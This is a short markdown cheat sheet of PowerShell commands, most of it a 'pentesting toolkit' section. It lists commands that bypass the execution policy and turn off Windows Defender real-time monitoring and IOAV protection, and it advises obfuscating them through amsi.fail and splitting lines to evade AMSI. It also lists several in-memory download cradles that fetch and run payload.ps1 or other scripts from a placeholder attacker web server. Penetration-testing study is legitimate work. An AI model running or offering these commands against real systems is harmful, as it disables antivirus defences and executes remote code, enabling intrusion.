AltomDevelopment/CommandLine_GitBash_Powershell/Powershell_CheatSheet.md

 ConvertTo-Html	Convert Microsoft .NET Framework objects into HTML web pages Invoke-RestMethod	Send an HTTP or HTTPS request to a RESTful web service

-**Powershell Pentesting Toolkit**

-Set-ExecutionPolicy -ExecutionPolicy Bypass	In this powerful command, “Bypass” means removing all obstacles to running commands/scripts and disabling warnings and prompts.
-ExecutionPolicy myth: If you configure it a certain way, it will automatically protect your device from malicious activities.
-ExecutionPolicy fact: It’s a self-imposed fence on PowerShell commands/scripts by a user, so if a malicious PowerShell script has caused damage, you already have a compromised machine.
-Jeffrey Snover, the creator of PowerShell, says:

-Learn more about ExecutionPolicy.
-Invoke-command -ScriptBlock{Set-MpPreference -DisableIOAVprotection $true}
-# Feed the above into https://amsi.fail to get the obfuscated (and runnable) version	Microsoft’s Antimalware Scan Interface (AMSI) allows antivirus software to monitor and block PowerShell scripts in memory.
-AMSI can recognize scripts meant to bypass AMSI by their hash signatures.
-So hackers/pentesters wise up.
-A typical workaround is obfuscation, such as creating dummy variables to hold values in the script and Base64-encoding these values.
-Good obfuscation makes it harder for AMSI to recognize a script.
-But a tried-and-tested workaround that doesn’t involve obfuscation is splitting it up into separate lines.
-Therein lies AMSI’s weakness: it can detect entire scripts but not anticipate whether incremental commands lead to unexpected results.
-Set-MpPreference -DisableRealTimeMonitoring $true
-# Feed the above into https://amsi.fail to get the obfuscated (and runnable) version	Turn off Windows Defender.
-This command also requires obfuscation as AMSI will identify and abort such scripts.
-Import-Module /path/to/module	Import module from a directory path /path/to/module iex (New-Object Net.WebClient).DownloadString('https://[webserver_ip]/payload.ps1')	Download execution cradle: a payload PowerShell script payload.ps1. iex (iwr http://[webserver_ip]/some_script.ps1 -UseBasicParsing) 	Downloading a PowerShell script some_script.ps1 and running it from random access memory (RAM) iex (New-Object Net.WebClient).DownloadString('http://[webserver_ip]/some_script.ps1')	Download a PowerShell script some_script.ps1 into RAM instead of disk iex (New-Object Net.WebClient).DownloadString('http://[webserver_ip]/some_script.ps1');command1;command2	Allow a PowerShell script some_script.ps1 to run commands (command1, command2) one at a time directly from RAM.
-The next item is an example.
-iex (New-Object Net.WebClient).DownloadString('http://localhost/powerview.ps1');Get-NetComputer	Run localhost’s PowerView (powerview.ps1) function Get-NetComputer directly from RAM.